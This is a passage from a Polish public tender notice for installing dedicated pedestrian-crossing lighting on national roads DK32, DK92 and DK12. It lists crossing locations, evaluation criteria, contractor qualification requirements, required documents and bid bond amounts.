głównej; <br/>b) w obrębie skrzyżowania (km 36+615, 36+634) obejmuje budowę: <br/>•	w km 36+615,<br/> - dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej, droga powiatowa nr 1147F, ul. Szeroka; <br/>•	w km 36+634,<br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej DK32, ul. Zielonogórska; <br/>4)	Poprawa BRD na przejściu dla pieszych na DK32 w m. Pław: <br/>a) w km 40+238 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej, ul Parkowa; <br/>5)	Poprawa BRD na przejściu dla pieszych na DK32 w m. Gronów: <br/>a) w km 42+346 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej, ul. Główna;<br/> 6) Poprawa BRD na przejściach dla pieszych na DK32 w m. Wilkanowo:<br/>a) w obrębie skrzyżowania (km 61+587, 61+608) obejmuje budowę: <br/>•	w km 61+587,<br/> - dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej DK32; <br/>•	w km 61+608,<br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej droga powiatowa nr 1181F. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria<br/>oceny ofert: Cena - 60 % = 60 pkt, Okres gwarancji - 20 % = 20 pkt, Doświadczenie Kierownika zadania - 20 % = 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV: Poprawa brd na przejściach dla pieszych na DK92 w m. Boczów, Torzym<br/>W zakresie zamówienia:<br/>4)	Poprawa BRD na przejściach dla pieszych na DK92b w m. Boczów: <br/>a) w km 4+162 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej ul. Gen. Władysława Sikorskiego; <br/>b) w km 4+490 obejmuje budowę: <br/> - dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej, ul. Parkowa; <br/>c) w km 4+595 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej ul. Gen. Władysława Sikorskiego; <br/>d) w obrębie skrzyżowania (km 4+775, 4+794) obejmuje budowę: <br/>•	w km 4+775,<br/> - dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej, ul. Dworcowa; <br/>•	w km 4+794,<br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej ul. Gen. Władysława Sikorskiego;<br/>5)	Poprawa BRD na przejścia dla pieszych na DK92 w m. Torzym: <br/>a) w km 12+713 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej, ul. Saperska; <br/>b) w km 12+830 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej, ul. Dworcowa; <br/>c) w obrębie skrzyżowania (km 14+435, 14+455, 14+475) obejmuje budowę: <br/>•	w km 14+435,<br/> - dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej ul. Wojska Polskiego;<br/>•	w km 14+455,<br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej droga wojewódzka nr 138, ul. Warszawska;<br/>•	w km 14+455,<br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej droga wojewódzka nr 138, ul. Krośnieńska;<br/>•	w km 14+475,<br/> - dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej ul. Wojska Polskiego;<br/>d)	w km 14+715 obejmuje budowę:<br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej ul. Wojska Polskiego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria<br/>oceny ofert: Cena - 60 % = 60 pkt, Okres Okres gwarancji- 20 % = 20 pkt, Doświadczenie Kierownika zadania - 20 % = 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część V: Poprawa brd na przejściach dla pieszych na DK92 w m. Poźrzadło, Stok, Mostki, Wilkowo, Lutol Suchy:<br/>W zakresie zamówienia: <br/>1.	Poprawa BRD na przejściach dla pieszych na DK92b w m. Poźrzadło: <br/>a) w obrębie skrzyżowania (km 26+119, 26+145) obejmuje budowę: <br/>•	w km 26+119,<br/> - dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej, <br/>- strefy przejściowej za i przed przejściem dla pieszych,<br/>•	w km 26+145,<br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej, droga powiatowa nr 1235F,<br/>2.	Poprawa BRD na przejściach dla pieszych na DK92b w m. Stok: <br/>a) w km 31+166 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej,<br/>b) w km 31+296 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej,<br/>3.	Poprawa BRD na przejściach dla pieszych na DK92b w m. Mostki: <br/>a)	w obrębie skrzyżowania (km 37+456, 37+483) obejmuje budowę: <br/>•	w km 37+456,<br/> - dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej,<br/>•	w km 37+483,<br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej, droga gminna, <br/>b)	w km 37+632 obejmuje budowę:<br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej,<br/>c)	w km 37+884 obejmuje budowę:<br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej, <br/>4.	Poprawa BRD na przejściach dla pieszych na DK92b w m. Wilkowo: <br/>a) w km 42+478 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej,<br/>b) w km 42+622 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej,<br/>c)	w km 43+049 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej,<br/>5.	Poprawa BRD na przejściach dla pieszych na DK92b w m. Lutol Suchy: <br/>a)	w obrębie skrzyżowania (km 65+303, 65+342) obejmuje budowę: <br/>•	w km 65+303,<br/> - dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej,<br/>•	w km 65+342,<br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria<br/>oceny ofert: Cena - 60 % = 60 pkt, Okres gwarancji - 20 % = 20 pkt, Doświadczenie Kierownika zadania - 20 % = 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część VI: Poprawa brd na przejściach dla pieszych na DK12 w m. Bobrzany:<br/>W zakresie zamówienia:<br/>6)	Poprawa BRD na przejściu dla pieszych na DK12 w m. Bobrzany: <br/>a)	w km 65+714 obejmuje: <br/>- korektę lokalizacji przejścia o ok 2 m w kierunku Szprotawy( z km 65+712 w km 65+714) z uwagi na bliskie położenie przy skrzyżowaniu; <br/>oraz budowę : <br/>- strefy oczekiwania dla pieszych o szer. 2 m, długości ok 4 m <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej;<br/>- strefy przejściowej przed i za przejściem dla pieszych; <br/>b) w km 65+966 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej;<br/>- strefy przejściowej przed i za przejściem dla pieszych; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria<br/>oceny ofert: Cena - 60 % = 60 pkt, Okres gwarancji - 20 % = 20 pkt, Doświadczenie Kierownika zadania - 20 % = 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: zdolności technicznej lub<br/>zawodowej a) dotyczącej Wykonawcy: Minimalny poziom zdolności: Wykonawca musi wykazać się wiedzą i doświadczeniem, w należytym wykonaniu (zakończeniu) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej:<br/> - jednego zadania polegającego na budowie lub przebudowie oświetlenia drogowego na drodze publicznej (gminnej, powiatowej, wojewódzkiej lub krajowej) o wartości co najmniej 60 000,00 PLN brutto.<br/>Za drogę Zamawiający uzna drogę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (tj. Dz. U. z 2023 r., poz. 645).<br/><br/>Za ulicę Zamawiający uzna ulicę (tj. drogę klasy GP, G, Z) w rozumieniu rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r., w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022 r., poz. 1518), wydanego na podstawie art. 7 ust. 2 pkt 2 i ust. 3 pkt 2 ustawy z dnia 7 lipca 1994 roku prawo budowlane (Dz. U. z 2023 r. poz. 682 ze zm.).<br/><br/>Za drogę lub ulicę Zamawiający uzna również drogę lub ulicę w rozumieniu uprzednio obowiązującego brzmienia ustawy z dnia 21 marca 1985 r. o drogach publicznych (tj. tj. Dz. U. z 2023 r., poz. 645).<br/><br/>Jako wykonanie należy rozumieć doprowadzenie, co najmniej, do wystawienia Świadectwa Przejęcia (dla Kontraktów realizowanych zgodnie z Warunkami FIDIC), Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia).<br/>Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia (wydanego zgodnie z Subklauzulą 10.1 dla kontraktów realizowanych zgodnie z Warunkami FIDIC) lub na dzień podpisania końcowego Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia) lub na dzień zakończenia realizacji umowy na świadczenie usług nadzoru.<br/><br/> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnianie warunku wskazanego powyżej musi wykazać przynajmniej jeden z Wykonawców<br/><br/><br/>b) dotyczącej osób:<br/>Wykonawca musi wskazać osobę, która będzie uczestniczyć w wykonywaniu zamówienia, legitymującą się kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do funkcji, jaka zostanie jej powierzona.<br/>Wykonawca, na funkcję wymienioną poniżej, wskaże osobę, którą musi mieć dostępną na etapie realizacji zamówienia, spełniającą następujące wymagania:<br/>- Osoba proponowana do pełnienia funkcji – Kierownik zadania.<br/>wymagana liczba osób: 1 osoba na każdą część zamówienia. Dopuszcza się wskazanie tej samej osoby do pełnienia funkcji na więcej niż 1 części zamówienia.<br/>Doświadczenie i kwalifikacje:<br/>Minimalny poziom zdolności:<br/> Pełnił funkcję/funkcje kierownicze, nadzorcze (od rozpoczęcia robót do<br/> ich zakończenia lub od podpisania umowy na świadczenie usługi nadzoru do<br/> zakończenia realizacji tej umowy) przy realizacji 1 zadania polegającego<br/> na wykonaniu budowy lub przebudowy oświetlenia drogowego na <br/> drodze publicznej (gminnej, powiatowej, wojewódzkiej, krajowej)<br/> o wartości robót co najmniej 60 000,00 zł brutto.<br/><br/><br/>UWAGA!<br/>Przez stwierdzenie: „pełnił funkcje kierownicze, nadzorcze” należy rozumieć pełnienie funkcji zarówno ze strony Inwestora jak i Wykonawcy (dyrektor, z-ca dyrektora, naczelnik, z-ca naczelnika, kierownik projektu, kierownik rejonu, inspektor nadzoru, kierownik budowy, kierownik robót, inne odpowiadające powyższym). <br/>Jako rozpoczęcie robót należy rozumieć datę faktycznego rozpoczęcia robót budowlanych poprzedzoną zawiadomieniem organu nadzoru budowlanego o terminie rozpoczęcia.<br/>Jako zakończenie robót należy rozumieć wystawienie co najmniej Świadectwa Przejęcia (wydanego zgodnie z Subklauzulą 10.1 dla kontraktów realizowanych zgodnie z warunkami FIDIC) lub podpisanie końcowego Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia).<br/>Jako zakończenie realizacji umowy na świadczenie usługi nadzoru należy rozumieć wystawienie Protokołu odbioru usługi lub równoważnego dokumentu potwierdzającego jej wykonanie).<br/>Za drogę Zamawiający uzna drogę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (tj. Dz. U. z 2023 r., poz. 645).<br/><br/>Za ulicę Zamawiający uzna ulicę (tj. drogę klasy GP, G, Z) w rozumieniu rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r., w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022 r., poz. 1518), wydanego na podstawie art. 7 ust. 2 pkt 2 i ust. 3 pkt 2 ustawy z dnia 7 lipca 1994 roku prawo budowlane (Dz. U. z 2023 r. poz. 682 ze zm.).<br/><br/>Za drogę lub ulicę Zamawiający uzna również drogę lub ulicę w rozumieniu uprzednio obowiązującego brzmienia ustawy z dnia 21 marca 1985 r. o drogach publicznych (tj. tj. Dz. U. z 2023 r., poz. 645).<br/>Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia (wydanego zgodnie z Subklauzulą 10.1 dla kontraktów realizowanych zgodnie z Warunkami FIDIC) lub na dzień podpisania końcowego Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia) lub na dzień zakończenia realizacji umowy na świadczenie usług nadzoru.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnianie warunku wskazanego powyżej Wykonawcy wykazują łącznie.<br/><br/>W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <br/>8.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich<br/>5 lat*, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>*licząc wstecz od dnia, w którym upływa termin składania ofert.<br/>b) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z Ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu Oferty wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy, Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do podmiotów udostępniających zasoby; w przypadku wskazania przez Wykonawcę dostępności ww. dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego dokumentów<br/>2) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu udostępniającego zasoby chyba, że umocowanie do reprezentacji wynika z dokumentów, o których mowa w pkt. 16.6. ppkt 1) IDW; <br/>3)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy; <br/>4) oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, z uwzględnieniem postanowień pkt. 18.3. IDW;<br/>5)	zobowiązania wymagane postanowieniami pkt. 11.3. IDW, w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do podpisania danego zobowiązania nie wynika z dokumentów, o których mowa w pkt. 16.6. ppkt 1) IDW; <br/>6) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawy Pzp; <br/>7) oświadczenie wymagane postanowieniami pkt. 10.2., 11.9. i 13.3. IDW , dotyczy także podmiotu udostępniającego zasoby <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: <br/>•	Część I: 4 300,00 zł (słownie złotych: cztery tysiące trzysta 00/100)<br/>•	Część II: 4 500,00 zł (słownie złotych: cztery tysiące pięćset 00/100)<br/>•	Część III: 4 600,00 zł (słownie złotych: cztery tysiące sześćset 00/100) <br/>•	Część IV: 5 400,00 zł (słownie złotych: pięć tysięcy czterysta 00/100)<br/>•	Część V: 6 300,00 zł (słownie złotych: sześć tysięcy trzysta 00/100)<br/>•	Część VI: 1 900,00 zł (słownie złotych: jeden tysiąc dziewięćset 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp i art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt 8.2. IDW.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 10.2 IDW<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku, gdy spełnienie warunku opisanego:<br/>1) w pkt. 8.2.4 a), b) IDW wykazuje co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>2) w pkt. 8.2.4 a), b) IDW wykonawcy wykazują poprzez poleganie na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/> wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie<br/>Zamawiającego złożyć aktualne na 